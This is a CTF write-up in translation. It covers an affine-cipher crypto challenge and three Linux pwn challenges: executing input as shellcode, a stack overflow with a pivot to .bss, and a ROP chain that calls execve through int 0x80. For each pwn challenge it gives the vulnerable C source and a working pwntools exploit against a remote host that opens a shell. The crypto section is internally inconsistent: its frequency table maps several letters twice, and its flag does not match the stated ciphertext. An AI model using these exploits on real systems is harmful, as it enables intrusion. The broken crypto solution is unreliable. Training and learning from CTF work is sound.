jivsyisgmlirgbggvuocevsivnsoevszotfloymivnmozwgitmbyfevtgugvffecgmflgtglimbggvjgmmuocevsivnijofcotgsoevsklgvflgkotjnkimmfejjhohyjifgnbwlyvfgtsiflgtgtmmcijjfeslfjwqvefstoyhmngrgjohgnflgetokvhiffgtvmozmhggulevnghgvngvfozgiuloflgtmocgjivsyisggdhgtfmbgjegrgflifwgitmisoklgvflgkotjnlinxymfzergfofgvcejjeovhgohjgflgwmhoqghgtlihmjivsyisgmbgfkggvflgcmoovizfgtkitnmcivwozflomghgohjgmfitfgnmgffjevsnokvfobguocgzitcgtmivnflgetjivsyisgmfoobguicgcotgmgffjgnivnzgkgtevvycbgtevtgugvfugvfytegmftingevnymfteijemifeovflgngrgjohcgvfozflgvifeovmfifgivnflgmhtginozyvergtmijuochyjmotwgnyuifeovgmhgueijjwsjobijemifeovivnbgffgtuoccyveuifeovmevflghimfzgknguingmijjlirguiymgncivwjivsyisgmfonemihhgitivnnocevivfjivsyisgmmyulimgvsjemlmhivemlivnulevgmgitgevutgimevsjwfiqevsorgtifhtgmgvfflgkotjnlimiboyfjivsyisgmflgnemftebyfeovozflgmgjivsyisgmemlysgjwyvgrgvflgsgvgtijtyjgemflifcejnpovgmlirgtgjifergjwzgkjivsyisgmozfgvmhoqgvbwcivwhgohjgklejglofkgfpovgmlirgjofmozfgvmhoqgvbwmcijjvycbgtmgytohglimovjwitoyvnjivsyisgmflgicgteuimiboyfizteuiivnimeiivnflghiuezeuhgtlihmozkleulhihyivgksyevgiijovgiuuoyvfmzotkgjjorgtflgcgneivvycbgtozmhgiqgtmemcgtgkleulfliflijzflgkotjnmjivsyisgmitgmhoqgvbwzgkgthgohjgflivflifijtginwkgjjorgtozflgfofijozjivsyisgmitgujomgfogdfevufeovkeflovjwizgkgjngtjwmhgiqgtmjgzfheuqiftivnocbymyyevuicgtoovgeslftgcievevsmhgiqgtmuleihivguoevcgdeuojehivihiulgevflgyvefgnmfifgmfkootfltggotkinxesyeviymftijeiovgkefliaygmfeovcitqvovgozflgmgmggcmfolirgcyululivugozmytrerij
Plaintext:
Languages have been coming and going for thousands of years, but in recent times there has been less coming and a lot more going. When the world was still populated by hunter-gatherers,small,tightly knit(联系)groups developed their own patterns of speech independent of each other. Some language experts believe that 10,000 years ago, when the world had just five to ten million people, they spoke perhaps 12, 000 languages between them.Soon afterwards, many of those people started settling down to become farmers, and their languages too became more settled and fewer in number. In recent centuries, trade, industrialisation, the development of the nation-state and the spread of universal compulsory education, especially globalisation and better communications in the past few decades, all have caused many languages to disappear, and dominant languages such as English,Spanish and Chinese are increasingly taking over.At present, the world has about 6, 800 languages. The distribution of these languages is hugely uneven. The general rule is that mild zones have relatively few languages, often spoken by many people, while hot wet zones have lots, often spoken by small numbers. Europe has only around 200 languages; the Americas about 1, 000; Africa 2, 400; and Asia and the Pacific perhaps 3,200, of which Papua New Guinea alone accounts for well over 800.The median number(中位数) of speakers is mere 6,000, which that half the world's languages are spoken by fewer people than that.Already well over 400 of the total of 6, 800 languages are close to extinction (消亡), with only a few elderly speakers left. Pick, at random, Busuu in Cameroon (eight remaining speakers), Chiapaneco in Mexico (150), Lipan Apache in the United States (two or three) or Wadjigu in Australia (one, with a question-mark): none of these seems to have much chance of survival

Ciphertext to decrypt:

givfome

  • Solution steps

    • Letter-frequency analysis gives the following mapping (plaintext letter => ciphertext letter)

      e =>g
      a =>i
      n =>v
      t =>f
      o =>o
      s =>m
      i =>e
      r =>j
      l =>t
      h =>l
      u =>y
      d =>s
      g =>h
      p =>n
      c =>u
      m =>c
      f =>z
      w =>k
      y =>b
      v =>w
      k =>r
      c =>q
      p =>d
      t =>p
      x =>x
      j =>a
  • Encryption script

```python
# Alphabet used by the cipher: 'p' has index 0 and 'o' index 25
table = ['p','q','r','s','t','u','v','w','x','y','z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o']
s = "eantosi"
m = ""
for i in s:
    k = 0
    for j in table:
        i = i.lower()
        if j == i:
            # affine step: index -> 19 * index + 18 (mod 26)
            l = (19 * k + 18) % 26
            m = m + table[l]
            break
        else:
            k = k + 1
print(m)
```

  • flag

flag{eantosi}
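The script above is an affine cipher over an alphabet that starts at p, with key (a, b) = (19, 18). As an added example (not the write-up's code), the cipher written out generally in Python, including the piece the write-up's frequency table was standing in for: because the challenge hands over a plaintext with its ciphertext, two known letter pairs (here l→j and a→i, the first letters of "Languages" and "jivsyisgm") are enough to solve for the key, after which "givfome" decrypts directly. The alphabet order is taken from the script; `modinv` and `recover_key` are helpers introduced here:

```python
# Alphabet as used by the write-up's script: 'p' is index 0, ..., 'o' is 25
TABLE = "pqrstuvwxyzabcdefghijklmno"


def _idx(ch):
    return TABLE.index(ch.lower())


def modinv(a, m=26):
    """Multiplicative inverse of a modulo m (a must be coprime to m)."""
    for x in range(1, m):
        if (a * x) % m == 1:
            return x
    raise ValueError("%d has no inverse mod %d" % (a, m))


def affine_encrypt(text, a=19, b=18):
    """c = a*p + b (mod 26) over TABLE; non-letters pass through unchanged."""
    return "".join(TABLE[(a * _idx(ch) + b) % 26] if ch.isalpha() else ch for ch in text)


def affine_decrypt(text, a=19, b=18):
    """p = a^-1 * (c - b) (mod 26)."""
    inv = modinv(a)
    return "".join(TABLE[(inv * (_idx(ch) - b)) % 26] if ch.isalpha() else ch for ch in text)


def recover_key(pairs):
    """Solve for (a, b) from two (plaintext letter, ciphertext letter) pairs.

    From c1 = a*p1 + b and c2 = a*p2 + b:
        a = (c1 - c2) * (p1 - p2)^-1 (mod 26),   b = c1 - a*p1 (mod 26).
    The pair must be chosen so that p1 - p2 is invertible mod 26 (odd, not 13).
    """
    (p1, c1), (p2, c2) = [(_idx(p), _idx(c)) for p, c in pairs]
    a = ((c1 - c2) * modinv((p1 - p2) % 26)) % 26
    b = (c1 - a * p1) % 26
    return a, b


# Known material from the challenge: the plaintext begins "Languages",
# the ciphertext "jivsyisgm"; "givfome" is the text to decrypt
KNOWN_PLAIN = "languages"
KNOWN_CIPHER = "jivsyisgm"
TARGET = "givfome"

if __name__ == "__main__":
    a, b = recover_key([("l", "j"), ("a", "i")])
    print(a, b, affine_decrypt(TARGET, a, b))
```

With a known-plaintext pair available, solving two linear congruences replaces the frequency count entirely; frequency analysis is what remains when only ciphertext is in hand.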

Pwn

shellcode

  • Description

    nc 139.199.10.70 10003

  • Key points

    - shellcode

  • Difficulty

    ★★

  • Challenge source

```c
#include <stdio.h>
#include <unistd.h>

/* Buffer the input is read into. Its declaration is missing from the listing
   on the page and is assumed here: 1024 bytes, so read(..., 1023) fits. */
char shellcode[1024];

int main()
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    printf("欢迎参加海啸杯?\n");
    printf("你听说过shellcode嘛?\n");
    printf("input:\n");
    read(0, shellcode, 1023);
    /* the input buffer is cast to a function pointer and called */
    (*(void (*)()) shellcode)();
}
/* flag{7aa4aa9d-bb79-48e8-860a-266cf870a8ff} */
```
  • Solution

The program reads a string and then calls it as a function. All protections are disabled, so sending shellcode as the input yields a shell.

Exploit script:

```python
from pwn import *

#sh = process("./shellcode")

sh = remote("139.199.10.70",10003)

shellcode = asm(shellcraft.sh())  # a /bin/sh shellcode for the target architecture

sh.sendline(shellcode)

sh.interactive()
```

  • flag

flag{7aa4aa9d-bb79-48e8-860a-266cf870a8ff}

simple_stackoverflow

  • Description

    nc 139.199.10.70 10004

  • Key points

    • shellcode
    • Stack pivot

  • Difficulty

    ★★★


  • Challenge source

```c
#include <stdio.h>
#include <unistd.h>

int overflow()
{
    char buf[24];
    read(0, buf, 1023);   /* reads far more than the 24-byte buffer holds */
    return 0;
}

int main()
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    overflow();
}

/* flag{5fa84896-6696-4d3f-a85c-41d0de6a5515} */
```
  • Solution

Protections are all disabled as before, but after sending shellcode its address on the stack is unknown, so the stack is pivoted: the first input calls read() to write the shellcode into the .bss segment, and the return address points into .bss so that the shellcode runs there and spawns a sh.

Exploit script:

```python
from pwn import *

#sh = process("./simple_stackoverflow2")

sh = remote("139.199.10.70",10004)

bss_address = 0x804a040

shellcode = asm(shellcraft.sh())

# 0x20 bytes of buffer/padding + saved ebp, then read@plt with return address = bss,
# arguments (0, bss, len(shellcode)); pwntools p32() returns bytes, so pad with bytes too
payload = b"a"*(0x20+4) + p32(0x08048390) + p32(bss_address) + p32(0) + p32(bss_address) + p32(len(shellcode))

sh.sendline(payload)

#time.sleep(1)

sh.send(shellcode)

sh.interactive()
```

  • flag

flag{5fa84896-6696-4d3f-a85c-41d0de6a5515}

rop

  • Description

    nc 139.199.10.70 10007

  • Key points

    • ROP
    • System call via int 0x80

  • Difficulty

    ★★★★


  • Challenge source

```c
#include <stdio.h>
#include <stdlib.h>

char *shell = "/bin/sh";

int main(void)
{
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stdin, 0LL, 1, 0LL);

    char buf[100];

    printf("This time, no system() and NO SHELLCODE!!!\n");
    printf("What do you plan to do?\n");
    gets(buf);   /* unbounded read into a 100-byte buffer */

    return 0;
}
```

  • Solution

There is no system() address to use, but ROPgadget finds gadgets that set eax, ebx, edx and ecx, and the address of an int 0x80 instruction. A direct system call is therefore used: int 0x80 with eax = 0xb, ebx = the address of "/bin/sh" and ecx = edx = 0 is equivalent to execve("/bin/sh").

Exploit script:

```python
from pwn import *

#sh = process("./rop")

sh = remote("139.199.10.70",10007)

ppp_dcb_address = 0x0806eb90   # pop edx; pop ecx; pop ebx; ret

p_eax = 0x080bb196             # pop eax; ret

bin_sh_address = 0x080be408

int_0x80_address = 0x08049421

# 112 bytes to the saved return address, then eax = 0xb (execve), edx = ecx = 0,
# ebx = "/bin/sh", and finally the int 0x80 gadget; p32() returns bytes, so pad with bytes
payload = b'a'*112 + p32(p_eax) + p32(0xb) + p32(ppp_dcb_address) + p32(0) + p32(0) + p32(bin_sh_address) + p32(int_0x80_address)

time.sleep(4)

sh.sendline(payload)

sh.interactive()

#flag{48cddff6-994e-409e-bb27-7b7366454253}
```
  • flag
flag{48cddff6-994e-409e-bb27-7b7366454253}